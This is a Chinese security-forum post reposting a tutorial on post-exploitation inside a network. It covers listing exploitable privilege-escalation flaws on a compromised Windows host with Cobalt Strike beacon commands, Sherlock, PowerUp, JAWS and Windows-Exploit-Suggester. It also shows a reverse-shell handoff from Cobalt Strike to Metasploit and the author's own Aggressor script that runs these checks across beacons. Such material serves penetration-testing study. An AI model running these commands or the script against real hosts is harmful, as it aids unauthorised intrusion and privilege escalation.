安全矩阵

 找回密码
 立即注册
搜索
查看: 2071|回复: 0

内网渗透--收集目标主机可利用漏洞

[复制链接]

189

主题

191

帖子

903

积分

高级会员

Rank: 4

积分
903
发表于 2022-5-31 20:29:30 | 显示全部楼层 |阅读模式
原文链接:内网渗透--收集目标主机可利用漏洞 (qq.com)


  对于内网渗透测试来说,如果能够对目标主机进行快速的定位可以利用的漏洞是再好不过了,即节省时间,又可以更好的获取到目标主机的更高权限,以此来作为跳板机进行内网横向扫描。
1、使用powershell脚本获取目标主机可利用漏洞详情
beacon>powershell-import Sherlock.ps1  //导入powershell脚本模块

编辑


编辑
beacon> powershell find-allvulns  //查找目标主机可以利用的漏洞,这样我们就可以使用相对应的漏洞exp进行利用,不至于自己盲目的去找。
编辑
2、MSF模块进行查找可以利用的漏洞
cobaltstrike中的shell转移到msf中,具体操作如下:

           
  •         首先在cobaltstrike中设置一个外部的监听,设置步骤如下:


编辑

           
  •         在MSF中进行监听7788端口

编辑

           
  •         点击spawn,选择刚才新建的外部监听MSF。

编辑

           
  •         VPS进行exploit,成功反弹shell

  • 编辑



编辑

           
  •         use post/multi/recon/local_exploit_suggester //使用MSF模块

  • 编辑




           
  •         成功罗列出目标主机可以利用的漏洞列表

编辑
3、PowerUp脚本

           
  •         将脚本上传到目标服务器:

meterpreter > load /root/PowerUp.ps1  //加载powershell模块
meterpreter > powershell_import '/root/PowerUp.ps1' //导入脚本
meterpreter > powershell_execute Invoke-AllChecks  //会输出所有可识别的漏洞
不清楚我的为啥执行不成功。使用CS也无法成功,登录到本地进行检查也无结果输出。
编辑

编辑


编辑

4、JAWS—Windows遍历脚本
目的是为了帮助渗透测试员快速识别Windows主机上的提权向量。
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt   //将脚本上传到目标服务器,执行此命令,即可获取到目标主机即可。主要功能如下
网络信息收集(接口,arp,netstat)
防火墙状态和规则
运行的进程
具有完全控制权限的文件和文件夹
映射驱动器
引人注意的异常文件
不带引号的服务路径
近期使用的文档
系统安装文件
AlwaysInstallElevted注册表项检查
存储的凭证
安装的应用
潜在的漏洞服务
MuiCache文件
计划任务
编辑
powershell jaws-enum.ps1  //获取目标主机的信息
编辑
5、Windows-Exploit-Suggester--提权辅助工具
python2.exe windows-exploit-suggester.py --update  //更新漏洞库列表

python2.exe windows-exploit-suggester.py --database 2021-05-
06-mssb.xls --systeminfo cmdback.txt  //运行脚本查看目标主机信息,罗列出可以利用的漏洞

python2.exe windows-exploit-suggester.py --database
2021-05-06-mssb.xls --ostext 'windows server 2008 r2'  //查找对应的系统漏洞。

为了更好的查找目标主机中可以利用的漏洞,小白我简单写了一个CS脚本。

编辑


编辑
  1. #收集目标主机可利用漏洞的脚本,涉及到powerup.ps1、sherlock.ps1、jaws-enum.ps1


  2. sub Sherlock {
  3.   bpowershell_import($1, script_resource("Sherlock.ps1"));
  4.   bpowershell($1, "Find-Allvulns");
  5. }


  6. sub jaws-enum {
  7.   bpowershell_import($1, script_resource("jaws-enum.ps1"));
  8.   bpowershell($1, "powershell powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt");
  9. }

  10. #PowerUp.ps1脚本查询,此脚本会输出所有可识别的漏洞

  11. sub PowerUp {
  12.   bpowershell_import($1, script_resource("PowerUp.ps1"));
  13.   bpowershell($1, "Invoke-Allchecks");
  14. }

  15. popup beacon_bottom {
  16.   menu "目标主机可利用漏洞查询" {   
  17.    
  18.     item "Sherlock脚本查询" {
  19.       if (-exists script_resource("Sherlock.ps1")) {   
  20.         local('$bid');
  21.         foreach $bid ($1) {
  22.           Sherlock($bid);
  23.         }
  24.       }
  25.       else {
  26.             berror($1, "Sherlock.ps1 does not exist :(");
  27.         }
  28.     }
  29.    
  30.    
  31.     item "jaws-enum脚本查询" {
  32.       if (-exists script_resource("jaws-enum.ps1")) {   
  33.         local('$bid');
  34.         foreach $bid ($1) {
  35.           jaws-enum($bid);
  36.         }
  37.       }
  38.       else {
  39.             berror($1, "jaws-enum.ps1 does not exist :(");
  40.         }
  41.       }
  42.        item "PowerUp脚本查询" {
  43.       if (-exists script_resource("PowerUp.ps1")) {   
  44.         local('$bid');
  45.         foreach $bid ($1) {
  46.           PowerUp($bid);
  47.         }
  48.       }
  49.       else {
  50.             berror($1, "PowerUp.ps1 does not exist :(");
  51.         }
  52.       }

  53.   }
  54. }
复制代码


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 21:59 , Processed in 0.015505 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表